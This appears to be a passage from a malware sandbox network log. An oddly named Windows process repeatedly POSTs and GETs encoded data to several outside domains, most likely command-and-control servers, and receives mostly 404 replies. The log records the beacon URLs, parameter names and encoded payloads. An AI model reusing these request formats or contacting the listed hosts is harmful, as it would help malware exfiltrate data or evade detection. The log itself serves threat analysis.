                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=N87iulGflmr507U6gvHswZPLCVtIqaDhil2OZdlA3LrgR92om9JwOmjZCsbxouXRZPBLY0PiOlkUDVfisCr/Xp14KE2yMkV7s4MFjnESbVulGD2EeIhttLmM/Cd7Sx1gKWQLLxnwjdVdSRJL59N2BC+xYygrL6i9CNZs48UsSDiwepLpF2hLDNGqQ2uABQehaHqS6njBlQS7XV3hp+H/fdqQJqcc70L+LQ==
Dec 3, 2024 14:39:07.975531101 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49922 | 162.0.213.94 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:09.390208006 CET | 1846 | OUT | POST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: u6nP_F48= [TRUNCATED]
Dec 3, 2024 14:39:10.677865982 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:10 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49928 | 162.0.213.94 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:12.053571939 CET | 554 | OUT | GET /odi0/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=A+TCtTOt1m7L0JkN7P72xqDuM3MJ0JKhh3i5FsNa0NmBZ9+GiOsXSm+4Udvcs/rcS+RMYR73IEQXFVaqqwbxWOBmPh+KTHFpnfkytlUBUFCYYxG0fJp40sWrzXdCUwp6RCE3NBU= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:13.325678110 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:13 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49946 | 68.66.226.92 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:19.361783028 CET | 794 | OUT | POST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:20.606991053 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:20 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49953 | 68.66.226.92 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:22.028326988 CET | 818 | OUT | POST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=J2YWpO0yT0lgzVxHKlzDW81PC5/UpUS/P5lIoB9W02Vz4o9uabagrl9Z7z4QJ9dCXHavoGIbUgoeUbBtOsYUxnlxVS23Da4pNUxd9ZX8EUDBzzYVOgelWRuoArgdHkHtxV29wirOlNVQnvkhsfbEo4G7S3w62kybrlXj9lmKj6vNm7eagzh58AKacwceW4Do3+knHjw4w/r3tuTpDSq3OisheJxOCHZwZw==
Dec 3, 2024 14:39:23.282828093 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:23 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49960 | 68.66.226.92 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:24.702032089 CET | 1831 | OUT | POST /ffyl/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.717hy.net
                                                                                                                            Referer: http://www.717hy.net/ffyl/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: u6nP_F48= [TRUNCATED]
Dec 3, 2024 14:39:25.939481020 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:25 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49965 | 68.66.226.92 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:27.373379946 CET | 549 | OUT | GET /ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.717hy.net
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:28.655323982 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 796
                                                                                                                            date: Tue, 03 Dec 2024 13:39:28 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                            x-content-type-options: nosniff
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49981 | 31.31.196.17 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:34.462908983 CET | 827 | OUT | POST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=f46nFxnhUTSRqWW+cw1BD8yoY1MwNVKxQ7fuaj7LWEalPU2K+5KTQM8VdXqf6QuxcFL0IJPjhGC9ClUh35vuHJ4vMNhGd/EkKAZWTpPSTRNiNn3cZwJ980PwJrfZGfpzs/7LFPetiCUSCTvum62sywCu7ggLQvRlsO7J3RB6yONFeI4ENUGVgP8Fe/PFZIrCuEfxUsUaHU0L
Dec 3, 2024 14:39:35.822945118 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:35 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49987 | 31.31.196.17 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:37.125868082 CET | 851 | OUT | POST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=f46nFxnhUTSRrzG+fTdBGcynBFMwH1K1Q7TuaiPbW2+lO2eK/7uTRM8VW3qa3wuqcFH8IM3jhHm9ChQh3KHxVp4pN9hASfEkKAZWTtn4TVZiNXHcaSx+/0P3Z7fZXPo6s/6sFOSLiHYSCSfumr2vogCsmwhjB6NgjtazrQRcsvR2WeleRnG2yfcHe9X3ZorosEnxG7Y9IgRo0xVBGOwngFzZ+r4yGWVQcg==
Dec 3, 2024 14:39:38.497212887 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:38 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49993 | 31.31.196.17 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:39.793891907 CET | 1864 | OUT | POST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:41.197916985 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:40 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50000 | 31.31.196.17 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:42.464874029 CET | 560 | OUT | GET /7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:43.824863911 CET | 330 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50020 | 130.185.109.77 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:49.922200918 CET | 812 | OUT | POST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:51.245121956 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:51 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50026 | 130.185.109.77 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:52.590816975 CET | 836 | OUT | POST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:53.834543943 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50033 | 130.185.109.77 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:55.266241074 CET | 1849 | OUT | POST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:56.580390930 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:56 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50034 | 130.185.109.77 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:57.928770065 CET | 555 | OUT | GET /q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:39:59.180696011 CET | 317 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 168
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50035 | 172.104.82.74 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:08.046125889 CET | 818 | OUT | POST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=Qxv5Wqat9pGaSfqQUN5an7+vawJ19+oABzsSz2sofkSbcFLcW9SKAT3Qbh9wdXGz+/FLjFBcJ2qSkhfey/u1OtFqncO/6nNWgcd1Fg625OZiGbGhWomTIRP9JMYHrhaRhvytR34009xmUyGg9Ka/VHXF1gaRsBWqtz8ylh1Ns3y6L/xuzJbXzKp+i5+c0dr7J/Foa4o0G4hm
Dec 3, 2024 14:40:09.457550049 CET | 464 | IN | HTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
